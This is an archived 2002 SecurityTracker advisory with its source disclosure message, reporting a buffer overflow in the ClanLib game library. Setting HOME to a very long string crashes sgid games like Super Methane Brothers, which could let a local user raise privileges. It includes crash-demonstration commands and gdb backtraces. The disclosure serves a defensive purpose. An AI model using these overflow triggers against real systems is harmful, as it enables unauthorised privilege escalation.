SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   ClanLib Game SDK Vendors:   Clanlib.org
ClanLib Game Software Development Kit Library Used By Many Game Applications Has Buffer Overflow That May Allow Local Users to Obtain Elevated or Root Privileges on the Host
SecurityTracker Alert ID:  1003244
SecurityTracker URL:  http://securitytracker.com/id/1003244
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2002
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system


Description:   A buffer overflow vulnerability was reported in a library included in the ClanLib game software development kit. A remote user can execute arbitrary code on the system. Some games that have set user id (suid) root privileges can be exploited by local users to yield root access.

A local user can set the HOME environment variable to a long string and then invoke a game that uses ClanLib to execute arbitrary code on the host. For example, the Super Methane Brothers game, which is apparently configured with set group id (sgid) 'games' group privileges, lets a local user execute code with 'games' group privileges and obtain elevated privileges on the host.

A demonstration exploit transcript is provided:

[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3)
http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

The author of the report has provided demonstration exploit transcripts for a few other vulnerable games that use ClanLib (see the Source Message).

Impact:   A local user can execute arbitrary code on the host to obtain elevated privileges. The privileges obtained depend on the game application that uses ClanLib.
Solution:   No solution was available at the time of this entry.
Vendor URL:  clanlib.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Clanlib overflow / Super Methane Brothers overflow


Charles stayed up all night and found a hole in Eterm so I felt 
obligated to stay up
all night and find something else wrong on my box too. In doing so I 
found an overflow
in a game included with Mandrake 8.1 called Super Methane Brothers. 
$HOME=<bof here>
then run /usr/games/methane. Inturn that caused me to find an overflow 
in ClanLib. So thanks
for staying up late last night core!

This was all tested against some rpms made from the mandrake src with 
"rpm --rebuild"
libclanlib0-0.4.4-28mdk
libclanlib0-magick-0.4.4-28mdk
clanlib-0.4.4-28mdk
libclanlib0-gl-0.4.4-28mdk
libclanlib0-png-0.4.4-28mdk
libclanlib0-devel-0.4.4-28mdk
libclanlib1-0.5.1-4mdk
libclanlib0-mikmod-0.4.4-28mdk

It looks like the buffer overflow in /usr/games/methane is a library 
Overflow in clanlib
instead. I checked some other clanlib based games to proove this.

[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3) 
http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

[root@linuxppc root]# ls -al /usr/games/methane
-rwxr-sr-x    1 root     games     1978056 Nov 13 06:36 /usr/games/methane*

This was default on my intel Mandrake 8.1 box. I overwrote edx and ecx 
with my own data.
I don't do intel so I didn't try any further. I got the packages for ppc 
and it was no fun
to play with so I decided to look at some other clanlib based games to 
at least verify the
library issue. I think the below link has info on the function causing 
the problem.

http://dark.x.dtu.dk/~sphair/cvs/Libs/ClanLib-0.5/Documentation/Reference/html/CL_SetupDisplay.html#2325

Here are some more examples of the clanlib overflow.

StarWar-0.0.1d.tar.gz
[root@linuxppc StarWar-0.0.1]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc StarWar-0.0.1]# src/starwar
Segmentation fault (core dumped)

This is the same place methane cored on my intel box...
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
(gdb) bt
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
#1  0x0ff89554 in FileConfig::LocalConfigFile () from 
/usr/lib/libclanCore.so.0
#2  0x0ff87014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3  0x0ff83b28 in CL_SetupCore::init_display () from 
/usr/lib/libclanCore.so.0
#4  0x1000d37c in InitDisplayApp::main ()
#5  0x0ff85270 in main () from /usr/lib/libclanCore.so.0
#6  0x0fc1eb90 in __libc_start_main () from /lib/libc.so.6

kwirk-0.0.16.tar.gz
[root@linuxppc Kwirk]# ./kwirk
Segmentation fault (core dumped)
(gdb)
#0  0x0fd36b78 in strcpy () from /lib/libc.so.6
#1  0x0fef0554 in FileConfig::LocalConfigFile () from 
/usr/lib/libclanCore.so.0
#2  0x0feee014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3  0x0feeab28 in CL_SetupCore::init_display () from 
/usr/lib/libclanCore.so.0
#4  0x1001e8f4 in TKwirk::init_modules (this=0x10054104) at kwirk.cpp:24
#5  0x0feec1fc in main () from /usr/lib/libclanCore.so.0
#6  0x0fcd3b90 in __libc_start_main () from /lib/libc.so.6

clankanoid-0.1.tgz
[root@linuxppc clanka]# ./clankanoid
Segmentation fault (core dumped)

I think you get the idea.
I would Imagine about any game on http://www.clanlib.org/links.html 
would have this issue also.
Im sure a few clanlib games are suid like the one that came with 
Mandrake 8.1 (methane)
-KF

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC